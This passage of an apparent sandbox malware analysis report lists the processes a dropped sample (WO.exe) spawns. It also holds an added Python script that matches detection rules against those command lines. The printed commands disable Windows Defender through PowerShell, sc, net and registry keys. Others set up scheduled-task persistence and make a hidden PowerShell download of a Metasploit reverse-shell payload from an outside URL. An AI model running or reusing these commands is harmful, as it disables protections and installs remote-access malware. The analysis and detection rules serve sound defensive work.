                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 00000006.00000002.2895574683.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000006.00000000.1732936032.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 00000006.00000000.1732936032.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: C:\Users\user\AppData\Local\Temp\reddit.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_MetasploitPayload, Description: Yara detected Metasploit Payload, Source: C:\Users\user\AppData\Local\Temp\reddit.exe, Author: Joe Security
                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: C:\Users\user\AppData\Local\Temp\reddit.exe, Author: unknown
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 89%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:7
                                                            Start time:13:54:04
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\attrib.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                                            Imagebase:0x7ff665990000
                                                            File size:23'040 bytes
                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:13:54:04
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks /query /TN "RunRedditLogon"
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:13:54:04
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks /create /tn "RunRedditLogon" /tr "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" /sc onlogon /rl highest /f
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:13:54:04
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks /query /TN "RunRedditMinute"
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:13:54:04
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks /create /tn "RunRedditMinute" /tr "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" /sc minute /mo 1 /rl highest /f
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:13:54:04
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:sc config WinDefend start= disabled
                                                            Imagebase:0x7ff6cc740000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:13
                                                            Start time:13:54:04
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\net.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:net stop WinDefend
                                                            Imagebase:0x7ff70ee30000
                                                            File size:59'904 bytes
                                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:14
                                                            Start time:13:54:04
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\net1.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\net1 stop WinDefend
                                                            Imagebase:0x7ff6abc70000
                                                            File size:183'808 bytes
                                                            MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:15
                                                            Start time:13:54:04
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\reg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                                                            Imagebase:0x7ff619dd0000
                                                            File size:77'312 bytes
                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:16
                                                            Start time:13:54:04
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\reg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                                                            Imagebase:0x7ff619dd0000
                                                            File size:77'312 bytes
                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

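Target IDs 3 through 16 above are one batch-driven sequence: a PowerShell Set-MpPreference call, a WebClient download, scheduled-task persistence at the highest run level (once at logon and once every minute), and three different ways of switching Defender off (service start type, service stop, policy registry keys). The script below is an added example and not part of the Joe Sandbox report. It runs a handful of rule-style checks over those command lines, copied from the process list, to show what a detection engine keys on and that the two schtasks /query probes (Target IDs 8 and 10) are correctly left alone. The rule names are mine and only echo the report's signature wording; including pwsh.exe alongside powershell.exe is an assumption, since the report only shows the Windows PowerShell image.

```python
"""Rule-style checks over the command lines in the process list (Target IDs 3-16).
Added example; events are copied from the report, rule names are illustrative."""
import re
from dataclasses import dataclass
from ntpath import basename
from typing import Pattern, Tuple


@dataclass(frozen=True)
class Rule:
    name: str
    images: Tuple[str, ...]   # lower-cased image basenames the rule is scoped to
    pattern: Pattern[str]     # searched against the full command line


RULES = (
    Rule("Disables Windows Defender (via powershell)",
         ("powershell.exe", "pwsh.exe"),   # pwsh.exe is an assumption, not in the report
         re.compile(r"Set-MpPreference\s+-Disable\w+\s+\$?true", re.I)),
    Rule("Tries to download files (via powershell)",
         ("powershell.exe", "pwsh.exe"),
         re.compile(r"\.(DownloadFile|DownloadString)\(|Invoke-WebRequest|\biwr\b", re.I)),
    Rule("Creates a scheduled task that runs at highest privilege",
         ("schtasks.exe",),
         # only /create counts; /query probes of the same task names stay quiet
         re.compile(r"/create\b(?=.*\s/sc\s+(onlogon|onstart|minute)\b)(?=.*\s/rl\s+highest\b)", re.I)),
    Rule("Suspicious Windows service tampering (WinDefend)",
         ("sc.exe",),
         re.compile(r"\bconfig\s+WinDefend\s+start=\s*disabled\b", re.I)),
    Rule("Suspicious Windows service tampering (WinDefend)",
         ("net.exe", "net1.exe"),
         re.compile(r"\bstop\s+WinDefend\b", re.I)),
    Rule("Modifies Windows Defender protection settings (registry)",
         ("reg.exe",),
         re.compile(r'\badd\s+"?HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender'
                    r'(?=.*/v\s+"?(DisableAntiSpyware|DisableRealtimeMonitoring)\b)'
                    r'(?=.*/d\s+1\b)', re.I)),
)

SYS32 = "C:\\Windows\\System32\\"
APPDATA_TASK = "C:\\Users\\user\\AppData\\Roaming\\HiddenScripts\\WO.exe"

# (Target ID, image path, command line) copied from the process list above.
EVENTS = (
    (3, SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe",
     'powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"'),
    (5, SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell -windowstyle hidden -Command \"(New-Object System.Net.WebClient)"
     ".DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', "
     "'C:\\Users\\user\\AppData\\Local\\Temp\\reddit.exe')\""),
    (8, SYS32 + "schtasks.exe", 'schtasks /query /TN "RunRedditLogon"'),
    (9, SYS32 + "schtasks.exe",
     f'schtasks /create /tn "RunRedditLogon" /tr "{APPDATA_TASK}" /sc onlogon /rl highest /f'),
    (10, SYS32 + "schtasks.exe", 'schtasks /query /TN "RunRedditMinute"'),
    (11, SYS32 + "schtasks.exe",
     f'schtasks /create /tn "RunRedditMinute" /tr "{APPDATA_TASK}" /sc minute /mo 1 /rl highest /f'),
    (12, SYS32 + "sc.exe", "sc config WinDefend start= disabled"),
    (13, SYS32 + "net.exe", "net stop WinDefend"),
    (14, SYS32 + "net1.exe", "C:\\Windows\\system32\\net1 stop WinDefend"),
    (15, SYS32 + "reg.exe",
     'reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" '
     '/v "DisableAntiSpyware" /t REG_DWORD /d 1 /f'),
    (16, SYS32 + "reg.exe",
     'reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection" '
     '/v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f'),
)


def scan(events):
    """Return (target id, rule name) for every command line a rule matches,
    in process-start order."""
    hits = []
    for target_id, image, cmdline in events:
        image_name = basename(image).lower()
        for rule in RULES:
            if image_name in rule.images and rule.pattern.search(cmdline):
                hits.append((target_id, rule.name))
    return hits


def tactics_seen(hits):
    """Distinct rule names in first-seen order: the one-line triage summary."""
    seen = []
    for _, rule_name in hits:
        if rule_name not in seen:
            seen.append(rule_name)
    return seen


if __name__ == "__main__":
    found = scan(EVENTS)
    for target_id, rule_name in found:
        print(f"Target {target_id:>2}: {rule_name}")
    print("\nchain:", " -> ".join(tactics_seen(found)))
```

Scoping each rule to an image basename is what keeps the false-positive rate sane: `stop WinDefend` in a net.exe command line is tampering, the same string inside a PowerShell help page is not. Note that net.exe hands the work to net1.exe, so the same action shows up twice (Target IDs 13 and 14); a rule on only net.exe would miss a direct net1 invocation like the one the report shows.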
                                                            Target ID:17
                                                            Start time:13:54:05
                                                            Start date:23/12/2024
                                                            Path:C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe
                                                            Imagebase:0x140000000
                                                            File size:129'024 bytes
                                                            MD5 hash:7176B040816932541EB9C2B91D90B29B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 58%, ReversingLabs
                                                            Has exited:true

                                                            Target ID:18
                                                            Start time:13:54:05
                                                            Start date:23/12/2024
                                                            Path:C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe
                                                            Imagebase:0x140000000
                                                            File size:129'024 bytes
                                                            MD5 hash:7176B040816932541EB9C2B91D90B29B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:19
                                                            Start time:13:54:06
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6F6D.tmp\6F7E.tmp\6F7F.bat C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                                            Imagebase:0x7ff7899b0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:20
                                                            Start time:13:54:06
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\7038.tmp\7039.tmp\703A.bat C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                                            Imagebase:0x7ff7899b0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:21
                                                            Start time:13:54:06
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:22
                                                            Start time:13:54:06
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:23
                                                            Start time:13:54:06
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:24
                                                            Start time:13:54:06
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:25
                                                            Start time:13:54:10
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:26
                                                            Start time:13:54:10
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:27
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\reddit.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Local\Temp\reddit.exe"
                                                            Imagebase:0x400000
                                                            File size:73'802 bytes
                                                            MD5 hash:23544090C6D379E3ECA7343C4F05D4D2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001B.00000002.2895620558.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 0000001B.00000002.2895620558.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001B.00000002.2895931053.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 0000001B.00000002.2895931053.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001B.00000000.1807295375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 0000001B.00000000.1807295375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: unknown
                                                            Has exited:false

                                                            Target ID:28
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\reddit.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Local\Temp\reddit.exe"
                                                            Imagebase:0x400000
                                                            File size:73'802 bytes
                                                            MD5 hash:23544090C6D379E3ECA7343C4F05D4D2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001C.00000002.2895801436.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 0000001C.00000002.2895801436.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001C.00000000.1807451210.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 0000001C.00000000.1807451210.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001C.00000002.2895627672.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 0000001C.00000002.2895627672.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: unknown
                                                            Has exited:false

                                                            Target ID:29
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\attrib.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                                            Imagebase:0x7ff665990000
                                                            File size:23'040 bytes
                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:30
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks /query /TN "RunRedditLogon"
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:31
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\attrib.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                                            Imagebase:0x7ff665990000
                                                            File size:23'040 bytes
                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:32
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks /query /TN "RunRedditLogon"
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:33
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks /query /TN "RunRedditMinute"
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:34
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks /query /TN "RunRedditMinute"
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:35
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:sc config WinDefend start= disabled
                                                            Imagebase:0x7ff6cc740000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:36
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:sc config WinDefend start= disabled
                                                            Imagebase:0x7ff6cc740000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:37
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\net.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:net stop WinDefend
                                                            Imagebase:0x7ff70ee30000
                                                            File size:59'904 bytes
                                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:38
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\net1.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\net1 stop WinDefend
                                                            Imagebase:0x7ff6abc70000
                                                            File size:183'808 bytes
                                                            MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:39
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\net.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:net stop WinDefend
                                                            Imagebase:0x7ff70ee30000
                                                            File size:59'904 bytes
                                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:40
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\net1.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\net1 stop WinDefend
                                                            Imagebase:0x7ff6abc70000
                                                            File size:183'808 bytes
                                                            MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:41
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\reg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                                                            Imagebase:0x7ff619dd0000
                                                            File size:77'312 bytes
                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:42
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\reg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                                                            Imagebase:0x7ff619dd0000
                                                            File size:77'312 bytes
                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:43
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\reg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                                                            Imagebase:0x7ff619dd0000
                                                            File size:77'312 bytes
                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:44
                                                            Start time:13:54:11
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\reg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                                                            Imagebase:0x7ff619dd0000
                                                            File size:77'312 bytes
                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:48
                                                            Start time:13:55:01
                                                            Start date:23/12/2024
                                                            Path:C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe
                                                            Imagebase:0x140000000
                                                            File size:129'024 bytes
                                                            MD5 hash:7176B040816932541EB9C2B91D90B29B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:49
                                                            Start time:13:55:01
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\481A.tmp\481B.tmp\481C.bat C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                                            Imagebase:0x7ff7899b0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
